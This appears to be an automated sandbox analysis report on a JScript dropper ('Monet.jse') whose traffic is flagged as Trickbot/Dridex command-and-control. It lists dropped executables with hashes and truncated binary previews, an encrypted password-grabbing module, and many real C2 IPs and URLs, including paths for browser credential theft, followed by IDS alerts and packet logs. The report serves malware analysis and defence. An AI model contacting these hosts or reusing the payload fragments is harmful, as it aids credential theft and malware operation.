C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SBAZIX4A\Bx6ECqoJ2[1].txt Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with very long lines, with no line terminators
Size (bytes):	316809
Entropy (8bit):	5.852892634294734
Encrypted:	false
MD5:	0DC0331F53A0BEA9331008FEB44DEC36
SHA1:	3C4094853A28C30D407FBE35719D63DCFA3067B6
SHA-256:	68AECDE534CB25EF6B936D7DC4AE068E8B44E7C5418E907B82EB0384E164D86E
SHA-512:	CC2F2D1CDD90C3876E721CD1B8D9E885265CD9C9FE56DCFC76EE1CE272C54D94B44643F7C8FEBE0194944D6269E2C17763745B1CE43DEBC54BC317691404A1BD
Malicious:	false
Reputation:	low
Preview:	TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADTZVgnlwQ2dJcENnSXBDZ0lwQ2dJIENnT1GyV0nwQ2dBQYOHSWBDZ0fxs8dJwENnR/GzJ0kAQ2dJcEN3Q4BDZ0fxs9dJAENnQvAjB0lgQ2dFJpY2iXBDZ0AAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAxS4lXgAAAAAAAAAA4AAPAQsBBgAAIAAAAHADAAAAAABsJwAAABAAAAAwAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAKADAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAYDoAALQAAAAAYAAA0DUDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAADoAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAACKGgAAABAAAAAgAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5hIAAAAwAAAAIAAAADAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAABwEAAAAUAAAABAAAABQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADQNQMAAGAAAABAAwAAYAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

C:\Users\user\AppData\Local\Temp\431846743.exe Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):	237590
Entropy (8bit):	7.678550231032194
Encrypted:	false
MD5:	2EA93B2945CCF91D29B4FAACC582174A
SHA1:	B51378F03804B2333DB264566B4F89363ECDEACD
SHA-256:	ED1ABBCBF007C75F2D4B6134AFF58F1AEC844B63D6E5302A8EC0B3387E017BC4
SHA-512:	2A154221809F0DF17C4F6B9C5512879A006461D588E2E11D4B4B0672EA9AA048D0C2D0B0F8C861FA449456A92587C2C9CE9BDA8B3500B25D1AAD7009AF6963F8
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........eX'..6t..6t..6t..6t..6t..%t..6t..8t..6t..<t..6t..2t..6t..7t8.6t..=t..6t/.0t..6tRich..6t................PE..L.....%^................. ...p......l'.......0....@.........................................................................`:.......`...5...........................................................................0...............................text............ .................. ..`.rdata.......0... ...0..............@..@.data........P.......P..............@....rsrc....5...`...@...`..............@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\431846743.tum Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with very long lines, with no line terminators
Size (bytes):	625961
Entropy (8bit):	6.047164572611149
Encrypted:	false
MD5:	F95BD3C4252EF50142430B3BE9925377
SHA1:	B11F154424221B12DB4C38E93B12135124E8FF6A
SHA-256:	1839D35E86B889F8331E801DA7A13C28282252F33D9365DC677411114A6BCCE7
SHA-512:	CACF2C6421079B8586F676C232A5302C53CB7E342F86DB5B65B7C46745643969BE7DC2659D0DB395C91B872E8308D728DA80AEDE9113445F1679EBFBFFC2C9D8
Malicious:	false
Reputation:	low
Preview:	TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADTZVgnlwQ2dJcENnSXBDZ0lwQ2dJIENnT1GyV0nwQ2dBQYOHSWBDZ0fxs8dJwENnR/GzJ0kAQ2dJcEN3Q4BDZ0fxs9dJAENnQvAjB0lgQ2dFJpY2iXBDZ0AAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAxS4lXgAAAAAAAAAA4AAPAQsBBgAAIAAAAHADAAAAAABsJwAAABAAAAAwAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAKADAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAYDoAALQAAAAAYAAA0DUDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAADoAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAACKGgAAABAAAAAgAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5hIAAAAwAAAAIAAAADAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAABwEAAAAUAAAABAAAABQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADQNQMAAGAAAABAAwAAYAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):	237590
Entropy (8bit):	7.678550231032194
Encrypted:	false
MD5:	2EA93B2945CCF91D29B4FAACC582174A
SHA1:	B51378F03804B2333DB264566B4F89363ECDEACD
SHA-256:	ED1ABBCBF007C75F2D4B6134AFF58F1AEC844B63D6E5302A8EC0B3387E017BC4
SHA-512:	2A154221809F0DF17C4F6B9C5512879A006461D588E2E11D4B4B0672EA9AA048D0C2D0B0F8C861FA449456A92587C2C9CE9BDA8B3500B25D1AAD7009AF6963F8
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........eX'..6t..6t..6t..6t..6t..%t..6t..8t..6t..<t..6t..2t..6t..7t8.6t..=t..6t/.0t..6tRich..6t................PE..L.....%^................. ...p......l'.......0....@.........................................................................`:.......`...5...........................................................................0...............................text............ .................. ..`.rdata.......0... ...0..............@..@.data........P.......P..............@....rsrc....5...`...@...`..............@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\WinNetCore\data\pwgrab64 Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Size (bytes):	1143936
Entropy (8bit):	7.999850733310765
Encrypted:	true
MD5:	9AD64EBF533BC746034EB7E1AC2E9016
SHA1:	37FA49EBB24C13ED0597C6C6AEDA13BE97132E87
SHA-256:	502A0024A2E8533BD37308D36CFBFE43915BC10A59D7FCAD35156ECDBD8C348F
SHA-512:	49DAD145827FDDBC0E10C12D138D2D762A8A36528AD1A3BD0E9D5A93D5F3855BE9EAA60C8DE9FF5F50FC976DD39C30EEEF916FD8884B2F5BD034ED858AAC614B
Malicious:	false
Reputation:	low
Preview:	...f.[c....T...P.o....9...y....$u~!..y..G.jB3'x.".E.......D..=.<.....`.+.e./S ..sA@.S.m.f.7.."..r.q".&.c......er...j.luoqs....>U.I..F......4n!.GI.kN...2..E.H...^.li..A_..o..T..M..s.-..^4.kt..1.05..2...f..9...h=.;.Z..B."Ul/..%;..J.y".c.7.....?.....V..Ld2o-E..s^.....1.....R.Hq..C.MqP.....t=..c.A.G.`m\|......$2..D..p.`.r...o.QE....l.s.....&..h.....4....\|.!hs..E...?..?q....'!.;.....7..:.,....G..b...uT.n.B9...].Un...Fa0.=L>.....]Ih`...vV9..bP....U.>v..EL.......x60Cr.s.#..%.@W.....xJ...^.{......{.1..@.Qc.......A.....AJ.Yz.....p....U.}.F...z.>~J..h..Kk}...T...sKD.".)j..}+...z.8....<................M......l...z..\..t..L....s.....Z.)2..Ot(V.;>..\.gW..l..'U/??..............0..}C.T....?o....T.7a...@. ..jE.~..K.'...I..."....C.]kS:..%..d4.A..=)t.X...@Tj..h.}....j....(9.......{.....*.-.5.YM...k...v......(=.1.u...9.......#z.y..nSH..1.w.2".otH(..<Y.1.....7W2.l...[ia...n...>aV.6_+.\|...]......ncM...Gn..ww.j `.Q........t.]..R.gWT...J..A..h....7,N....""&.x.z.2#VU:..R...TT.@Zy2..............(..Y...xB....\

C:\Users\user\AppData\Roaming\WinNetCore\settings.ini Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	FORTRAN program
Size (bytes):	16372
Entropy (8bit):	5.075701324289043
Encrypted:	false
MD5:	69347C7EE8053B0B29F9ECB72EB514E9
SHA1:	16FF04DD08BB19166F02D830933C8409D8474AF9
SHA-256:	A2EC5FA84F87DE080EF4DA9DDF87D1D3E994CD54FA1501E5C41698C4633FDA7D
SHA-512:	921761BBD044F43D5F3380816A20CE50F13073506D6BA795DBEAEF8B0515CBD452A9586A3A9E8EF889AFB186AD2FA4911D09EEE6006CBE832304AC7DD8CB016A
Malicious:	false
Reputation:	low
Preview:	[qwfqyhs]..yxg=gcnyh sbmx grcnyhs bm zit n vepxg ralw fq jvep y ualw fqyhs ..ynyhsbmxgralw=qkvbju doz itc nyhsbm xgralw fq g vep v udowf q c..tzitcnyhsbmxg=gp au dozf q gv ep vua lw fq cvep rudlw cnyhsb mxgra lwfq tvem xg ra..ixgralw=pzitcnyh s ru do..vxgralwfnyh=iyhs uudo zit cn yhsbmxgr alwfq y..pyhsbmudozit=cyhsbmxd ozit cny hp k udozit cnyhsb mx grziq mv gral iyhsb mx..rp ludozi=rtcnyhsb rcpakxis..fziyhsdo=fyjwhsanyhs..j iudq =mt i vfsgt ercpan iyj wfsdqb mx gran v yjwh..o o mtepaly=to tzk xi vgter a..hjwhufsdqbo=tte rcpan twhufs dqbo r zkx..cpan cy=fxivgt..shufsdq=vtercpan..wvgte=ujwhufsd..kpa=ohufsd qbo ozk xiv..rxivgte=gpa n g yjwhufsd qbo gz kxivgter cp an gyj..slyjwhufsdq=dpan d yjwhu fs dqbo dz kxivg ter..expan ryjwh=e bwhu fs dqbo yjw hu fpan ..qjwhufsdq=ixi vgter cpan i yjwhufsd qb o izkxiv gtercp..arcmz=izkxfs dq cyj wh ufs dqbo cz kxivgt er yz kx fsdqbo vzkxf sdqbo s..jfpan gyj=alyjw er cp an wyjw hufsd qbo wzkx ivgter cpdtdth xl q w..docsgwk c=xqeueqe uiy

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
elb097307-934924932.us-east-1.elb.amazonaws.com	54.204.26.223	true	false	high
62.52.17.84.cbl.abuseat.org	127.0.0.2	true	false	high
api.ipify.org	unknown	unknown	false	high
62.52.17.84.zen.spamhaus.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/14/user/SYSTEM/0/	true	unknown
https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/1/P9VEk5oK3B7qmh1wSz/	true	unknown
https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/14/NAT%20status/client%20is%20behind%20NAT/0/	true	unknown
https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/10/62/GDFUKAPEGYZAQTQ/1/	true	unknown
http://203.176.135.102:8082/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/83/	true	unknown
https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/0/Windows%207%20x64%20SP1/1083/84.17.52.62/217C05512A13BF0D1975043DC440D43A0AD4D5BF9D7809375E0491B975D5B4A3/nfYREqCrC5seZ7lm5k4Fqwmud/	true	unknown
https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DPST/browser/	true	unknown
https://api.ipify.org/?format=text	false	high
https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/spk/	true	unknown
https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DEBG/browser/	true	unknown
https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/VERS/browser/	true	unknown
http://185.195.237.14/21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711	true	unknown
https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/dpost/	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://203.176.135.102:8082/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/83/-4B97C760B13D	svchost.exe, 00000024.00000002.56181457184.0000000000269000.00000004.00000020.sdmp	false		unknown
http://36.89.106.69:80	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://ocsp.entrust.net03	svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://203.176.135.102:8082	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Login Data.bak.36.dr	false		high
http://103.84.238.3:80	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://185.195.237.14/21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711bin	wscript.exe, 00000000.00000002.55143060181.0000000003EA6000.00000004.00000001.sdmp	false		unknown
http://5.2.64.188:443	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://112.78.164.34:8082	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://51.89.115.110:443	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://185.99.2.137:443	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://96.:80	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://103.94.122.254:8082	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search?ei=	Login Data.bak.36.dr	false		high
http://188.165.62.29:443	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://112.78.164.34:8082Vault	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		low
http://ocsp.entrust.net0D	svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://5.2.78.191:443	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://164.68.96.155:443	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://190.119.180.226:8082	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://36.89.10	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		low
http://crl.entrust.net/server1.crl0	svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	false		high
http://195.123.219.93:443	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://177.74.232.124:80	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://164.68.96.155:443m	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		low
https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DPST/browser/8s	svchost.exe, 00000012.00000002.56180117106.0000000002148000.00000004.00000001.sdmp	false		unknown
http://96.9.73.73:80	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://190.100.16.210:8082	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://185.99.2.185:443	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://96.9.77.142:80	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
https://185.62.189.249:447/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/pwgrab64/	svchost.exe, 00000012.00000002.56180117106.0000000002148000.00000004.00000001.sdmp	false		unknown
http://188.165.62.2:443	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://170.238.117.187:8082	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://203.176.135.102:8082ault	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		low
http://195.123.216.95:443	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		unknown
http://170.238.117.187:8082ault	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		low
https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/VERS/browser/:	svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	false		unknown
https://secure.comodo.com/CPS0	svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	false		high
http://103.94.122.254:8082lt	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		low
http://195.123.219.93:443x	svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	false		low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	ASN	ASN Name	Malicious
185.195.237.14	Greenland	206804	unknown	true
203.176.135.102	Cambodia	38235	unknown	true
181.129.104.139	Colombia	13489	unknown	true
54.204.26.223	United States	14618	unknown	false
185.62.189.249	Netherlands	49349	unknown	true
5.2.78.43	Netherlands	60404	unknown	true

Private

IP
192.168.0.40
192.168.0.255

Static File Info

General
File type:	data
Entropy (8bit):	5.4900585989430315
TrID:
File name:	Monet.jse
File size:	309133
MD5:	3e8c58262860fcbce68af93f4a022232
SHA1:	a2e6ff304f8268a8cc1230d2037476617d026b57
SHA256:	bbccc885dda0a4c41592d323d26d78f1c2d024c0061c414de7af5e4e98c8be09
SHA512:	a7e012aaf9459641e824d7bf2a4a09198517bd90839389665bb744a6ee2158baecad65427af959d1c2b285ca8fb5d06deace9577f8c35deb1205a10a2a2c72be
SSDEEP:	3072:UEnnz0uen3Y2uk8605lvRAEKPUiHpwaT7:UMnzpen33uk86mlvRAEKPvHpw2
File Content Preview:	try { fr244(); } catch(wifcrgive84ko){};try { fr447("."); } catch(wifcrlooked90ko){};try { fr438(""); } catch(wifcrinsult11ko){};try { fr130(""); } catch(wifcrmanners44ko){};try { fr718(); } catch(wifcroldshoes98ko){};try { fr607(); } catch(wifcrsha

File Icon


Icon Hash:	e8d69ece968a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/20/20-14:15:18.379629	TCP	2404310	ET CNC Feodo Tracker Reported CnC Server TCP group 6	49187	449	192.168.0.40	181.129.104.139
01/20/20-14:19:03.794844	TCP	2404334	ET CNC Feodo Tracker Reported CnC Server TCP group 18	49189	443	192.168.0.40	5.2.78.43
01/20/20-14:20:17.600577	TCP	2021013	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)	447	49193	185.62.189.249	192.168.0.40
01/20/20-14:21:01.081165	TCP	2404326	ET CNC Feodo Tracker Reported CnC Server TCP group 14	49203	8082	192.168.0.40	203.176.135.102

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 20, 2020 14:13:55.215322018 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.263183117 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.264518023 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.265165091 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.312994957 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.326801062 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.326831102 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.326853037 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.326869011 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.326922894 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.327029943 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.327481985 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.327503920 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.327519894 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.327658892 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.327687979 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.327758074 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.327789068 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.327805042 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.327824116 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.327862024 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.327960968 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.328098059 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.328123093 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.328218937 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.328222990 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.328335047 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.341166973 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.375087023 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.375133991 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.375149012 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.375688076 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.375883102 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.375905037 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.375919104 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.376100063 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.376184940 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.376211882 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.376229048 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.376250029 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.376358032 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.376360893 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.376374960 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.376430035 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.376668930 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.376707077 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.376709938 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.376735926 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.376758099 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.376828909 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.376878023 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.376895905 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.376933098 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.377002001 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.377120972 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.377403021 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.377424002 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.377439022 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.377557993 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.377568007 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.377679110 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.377693892 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.378051043 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.378108025 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.378221989 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.378256083 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.378288031 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.378381014 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.378422022 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.378437042 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.378555059 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.379138947 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.381445885 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.423536062 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.423573017 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.423589945 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.423650980 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.423758984 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.423796892 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.423866987 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.423891068 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.423996925 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.424268007 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.424290895 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.424307108 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.424392939 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.424488068 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.424488068 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.424510002 CET	80	49186	185.195.237.14	192.168.0.40
